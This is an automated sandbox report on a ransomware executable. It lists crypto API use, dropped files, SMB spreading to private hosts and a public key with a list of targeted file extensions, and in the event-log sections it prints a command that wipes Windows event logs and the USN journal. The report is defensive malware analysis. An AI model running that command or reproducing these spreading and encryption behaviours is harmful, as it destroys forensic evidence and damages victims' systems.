Analysis Report

Overview

General Information

Joe Sandbox Version:	20.0.0
Analysis ID:	394065
Start time:	10:18:19
Joe Sandbox Product:	Cloud
Start date:	25.10.2017
Overall analysis duration:	0h 9m 59s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	i0YxTJ2SO.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	28
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled GSI enabled (VBA) GSI enabled (Javascript)
Detection:	MAL
Classification:	mal84.evad.spre.expl.rans.winEXE@35/5@0/4
HCA Information:	Successful, ratio: 99% Number of executed functions: 101 Number of non-executed functions: 75
EGA Information:	Successful, ratio: 100%
Cookbook Comments:	Found application associated with file extension: .exe
Warnings:	Show All Connection to analysis system has been lost Exclude process from analysis (whitelisted): conhost.exe, dllhost.exe Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	84	0 - 100	Report FP / FN

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Signature Overview

Click to jump to signature section

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475507 CryptAcquireContextW,CryptAcquireContextW,GetLastError,CryptAcquireContextW,	3_2_00475507
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475BC4 GetSystemInfo,__alldiv,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,memcpy,FlushViewOfFile,LocalFree,CryptDestroyHash,UnmapViewOfFile,	3_2_00475BC4
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_004715A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_004715A7
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475A73 GetSystemInfo,__alldiv,MapViewOfFile,CryptDuplicateHash,CryptHashData,LocalAlloc,CryptGetHashParam,LocalFree,CryptDestroyHash,UnmapViewOfFile,	3_2_00475A73
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475613 CryptStringToBinaryW,CryptStringToBinaryW,LocalAlloc,LocalAlloc,CryptStringToBinaryW,CryptDecodeObjectEx,CryptDecodeObjectEx,LocalAlloc,CryptDecodeObjectEx,CryptImportPublicKeyInfo,LocalFree,LocalFree,	3_2_00475613
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475D0A CryptDuplicateKey,CreateFileW,GetFileSizeEx,__alldiv,CreateFileMappingW,MapViewOfFile,CryptEncrypt,FlushViewOfFile,UnmapViewOfFile,CloseHandle,CloseHandle,CryptDestroyKey,SetEvent,	3_2_00475D0A
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0047554A CryptAcquireContextW,GetLastError,CryptGenRandom,CryptReleaseContext,	3_2_0047554A
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00476299 CreateEventW,CreateThread,WaitForSingleObject,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,CloseHandle,LocalFree,	3_2_00476299
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_0047559B CryptSetKeyParam,CryptSetKeyParam,CryptSetKeyParam,CryptGetKeyParam,LocalAlloc,CryptSetKeyParam,LocalFree,	3_2_0047559B
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00475780 CryptBinaryToStringW,CryptBinaryToStringW,LocalAlloc,CryptBinaryToStringW,LocalFree,	3_2_00475780
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_004756D8 CryptEncrypt,CryptEncrypt,LocalAlloc,memcpy,CryptEncrypt,LocalFree,	3_2_004756D8
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00476085 CryptCreateHash,CryptHashData,CryptDeriveKey,CryptDestroyHash,	3_2_00476085
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00476246 CryptCreateHash,CryptHashData,CryptGetHashParam,	3_2_00476246

Spam, unwanted Advertisements and Ransom Demands:

Contains functionality to import cryptographic keys (often used in ransomware)

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_004715A7 GetProcessHeap,GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,HeapAlloc,CryptAcquireContextW,GetProcessHeap,HeapAlloc,CryptImportKey,CryptCreateHash,CryptSetHashParam,GetProcessHeap,HeapFree,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,

3_2_004715A7

Clears the journal log

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

Clears the windows event log

Show sources

Source: unknown	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\cmd.exe /c wevtutil cl Setup & wevtutil cl System & wevtutil cl Security & wevtutil cl Application & fsutil usn deletejournal /D C:

Exploits:

Connects to many different private IPs (likely to spread or exploit)

Show sources

Source: global traffic	TCP traffic: 192.168.1.1:445
Source: global traffic	TCP traffic: 192.168.1.0:139
Source: global traffic	TCP traffic: 192.168.1.2:80

Connects to many different private IPs via SMB (likely to spread or exploit)

Show sources

Source: global traffic	TCP traffic: 192.168.1.1:445
Source: global traffic	TCP traffic: 192.168.1.0:139
Source: global traffic	TCP traffic: 192.168.1.2:445

Networking:

Contains functionality to download additional files from the internet

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00471EB9 GetProcessHeap,GetProcessHeap,HeapAlloc,HeapAlloc,GetProcessHeap,HeapAlloc,htons,send,recv,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

3_2_00471EB9

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBRi82PVYYKWGJWdgVNyePy5kYTdqQQUX5r1blzMzHSa1N197z%2Fb7EyALt0CEA7P9DjI%2Fr81bgTYapgbGlA%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: ts-ocsp.ws.symantec.com
Source: global traffic	HTTP traffic detected: GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBQd11mpyHEqFCSocj4SCu93CBydHAQUr2PWyqNOhXLgp7xB8ymiOH%2BAdWICEFRY8qrXQdZEvISpe6CWUuY%3D HTTP/1.1Connection: Keep-AliveAccept: /User-Agent: Microsoft-CryptoAPI/6.1Host: ts-ocsp.ws.symantec.com

Urls found in memory or binary data

Show sources

Source: rundll32.exe	String found in binary or memory: http://192.168.1.2/
Source: rundll32.exe	String found in binary or memory: http://192.168.1.2/g
Source: i0YxTJ2SO.exe, cscc.dat.3.dr, infpub.dat.1.dr	String found in binary or memory: http://crl.thawte.com/thawtetimestampingca.crl0
Source: rundll32.exe, cscc.dat.3.dr, dispci.exe.3.dr	String found in binary or memory: http://diskcryptor.net/
Source: i0YxTJ2SO.exe, cscc.dat.3.dr, infpub.dat.1.dr	String found in binary or memory: http://ocsp.thawte.com0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://rb.symcb.com/rb.crl0w
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://rb.symcb.com/rb.crt0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://rb.symcd.com0&
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://s.symcd.com0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://s.symcd.com06
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0w
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://sf.symcd.com0&
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: i0YxTJ2SO.exe, cscc.dat.3.dr, infpub.dat.1.dr	String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: i0YxTJ2SO.exe, cscc.dat.3.dr, infpub.dat.1.dr	String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: i0YxTJ2SO.exe, cscc.dat.3.dr, infpub.dat.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: infpub.dat.1.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: https://d.symcb.com/rpa0.
Source: i0YxTJ2SO.exe, infpub.dat.1.dr	String found in binary or memory: https://d.symcb.com/rpa06

Boot Survival:

Contains functionality to start windows services

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00479534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError,

3_2_00479534

Uses schtasks.exe or at.exe to add and modify task schedules

Show sources

Source: unknown

Process created: C:\Windows\System32\schtasks.exe schtasks /Delete /F /TN rhaegal

Persistence and Installation Behavior:

Drops PE files

Show sources

Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\dispci.exe
Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\cscc.dat
Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\9706.tmp
Source: C:\Users\user\Desktop\i0YxTJ2SO.exe	File created: C:\Windows\infpub.dat

Drops PE files to the windows directory (C:\Windows)

Show sources

Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\dispci.exe
Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\cscc.dat
Source: C:\Windows\System32\rundll32.exe	File created: C:\Windows\9706.tmp
Source: C:\Users\user\Desktop\i0YxTJ2SO.exe	File created: C:\Windows\infpub.dat

Drops executables to the windows directory (C:\Windows) and starts them

Show sources

Source: C:\Windows\System32\rundll32.exe

Executable created and started: C:\Windows\9706.tmp

Data Obfuscation:

Contains functionality to dynamically determine API calls

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00479016 VirtualProtect,LoadLibraryA,GetProcAddress,VirtualProtect,

3_2_00479016

PE file contains an invalid checksum

Show sources

Source: 9706.tmp.3.dr

Static PE information: real checksum: 0x114bd should be: 0x1e635

Uses code obfuscation techniques (call, push, ret)

Show sources

Source: C:\Windows\9706.tmp

Code function: 10_2_013059E5 push ecx; ret

10_2_013059F8

Spreading:

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\System32\rundll32.exe

Code function: 3_2_00475E9F PathCombineW,FindFirstFileW,WaitForMultipleObjects,PathCombineW,StrStrIW,PathFindExtensionW,FindNextFileW,FindClose,

3_2_00475E9F

Creates COM task schedule object (often to register a task for autostart)

Show sources

Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs

Contains functionality to enumerate network shares of other devices

Show sources

Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00479534 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,GetLastError,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,OpenSCManagerW,memset,GetSystemTimeAsFileTime,wsprintfW,CreateServiceW,StartServiceW,GetLastError,QueryServiceStatus,Sleep,DeleteService,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError,DeleteFileW,WNetCancelConnection2W,SetLastError, \\%s\admin$		3_2_00479534
Source: C:\Windows\System32\rundll32.exe	Code function: 3_2_00479B63 wsprintfW,wsprintfW,wsprintfW,wsprintfW,PathFindExtensionW,wsprintfW,WNetAddConnection2W,PathFileExistsW,GetLastError,GetLastError,WNetCancelConnection2W,GetCurrentThread,OpenThreadToken,DuplicateTokenEx,memset,GetSystemDirectoryW,CloseHandle,PathAppendW,PathFileExistsW,wsprintfW,CreateProcessAsUserW,CreateProcessW,WaitForSingleObject,GetExitCodeProcess,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,PathFileExistsW,GetLastError,GetLastError,DeleteFileW,CloseHandle,CloseHandle,WNetCancelConnection2W,SetLastError, \\%s\admin$		3_2_00479B63

System Summary:

Contains modern PE file flags such as dynamic base (ASLR) or NX

Show sources

Source: i0YxTJ2SO.exe

Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Binary contains paths to debug symbols

Show sources

Source:	Binary string: dcrypt.pdbp source: rundll32.exe, cscc.dat.3.dr
Source:	Binary string: wdigest.pdb source: 9706.tmp
Source:	Binary string: dcrypt.pdb source: rundll32.exe, cscc.dat.3.dr
Source:	Binary string: wdigest.pdbJ6 source: 9706.tmp

Binary contains device paths (device paths are often used for kernel mode <-> user mode communication)

Show sources

Source: cscc.dat.3.dr

Binary string: configFlags\Device\dcrypt\DosDevices\dcryptdump_hiber_%s\$dcsys$$dcsys$\Device\CdRom%s\$DC_TRIM_%x$$dcsys$_fail_%xNTFSFATFAT32exFATH

Binary contains paths to development resources

Show sources

Source: dispci.exe.3.dr	Binary or memory string: MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA5clDuVFr5sQxZ+feQlVvZcEK0k4uCSF5SkOkF9A3tR6O/xAt89/PVhowvu2TfBTRsnBs83hcFH8hjG2V5F5DxXFoSxpTqVsR4lOm5KB2S8ap4TinG/GN/SVNBFwllpRhV/vRWNmKgKIdROvkHxyALuJyUuCZlIoaJ5tB0YkATEHEyRsLcntZYsdwH1P+NmXiNg2MH5lZ9bEOk7YTMfwVKNqtHaX0LJOyAkx4NR0DPOFLDQONW9OOhZSkRx3V7PC3Q29HHhyiKVCPJsOW1l1mNtwL7KX+7kfNe0CefByEWfSBt1tbkvjdeP2xBnPjb3GE1GA/oGcGjrXc6wV8WKsfYQIDAQAB.3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.\AppData\ProgramData\Program Files\Windows.encrypted%lS OK
